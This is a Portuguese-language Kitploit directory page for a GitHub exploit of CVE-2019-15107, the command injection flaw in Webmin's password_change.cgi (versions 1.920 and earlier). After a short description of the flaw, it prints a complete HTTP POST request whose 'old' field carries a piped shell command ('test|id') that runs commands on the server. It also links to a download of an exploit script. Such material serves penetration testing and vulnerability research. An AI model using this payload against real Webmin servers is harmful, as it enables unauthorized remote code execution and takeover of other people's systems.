Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
WebminRCE-EXP-CVE-2019-15107- — Vulnerabilidade de Execução Remota de Código no Webmin | Kitploit
Ferramentas/GitHubGitHub/alewong/webminrce-exp-cve-2019-15107-
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e Controle
GitHubalewong/webminrce-exp-cve-2019-15107-

WebminRCE-EXP-CVE-2019-15107-

Vulnerabilidade de Execução Remota de Código no Webmin

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
35há 6 anosAinda não revisado

CVE-2019-15107: Exploit Modules Available for Remote Code Execution Vulnerability in Webmin

  1. Descrição da vulnerabilidade O Webmin é uma ferramenta de gerenciamento baseada em Web, poderosa e amplamente usada em sistemas Unix. Durante o processamento da requisição em Password_Change.cgi, o parâmetro old apresenta uma vulnerabilidade de injeção de comando, que pode ser explorada maliciosamente por atacantes. Quando o usuário ativa a função de redefinição de senha do Webmin, um atacante pode usar essa vulnerabilidade para executar comandos arbitrários no sistema afetado, obtendo assim o shell do sistema.

Versões afetadas: Webmin 1.920 e versões anteriores

  1. Exploração Método 1: Verificação manual Acesse a página, ignore o certificado e você verá a página de login do Webmin. step 1

Envie o seguinte pacote de dados para executar o comando id:

POST /password_change.cgi HTTP/1.1 Host: your-ip:10000 Accept-Encoding: gzip, deflate Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Cookie: redirect=1; testing=1; sid=x; sessiontest=1 Referer: https://your-ip:10000/session_login.cgi Content-Type: application/x-www-form-urlencoded Content-Length: 60

user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2 step 2

Método 2: Usando script step 3

Baixar ferramenta